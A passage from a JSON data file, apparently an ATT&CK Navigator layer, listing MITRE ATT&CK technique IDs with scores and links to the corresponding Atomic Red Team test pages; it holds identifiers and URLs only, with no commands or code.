enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.
md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic
-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqu
eID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T
1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github
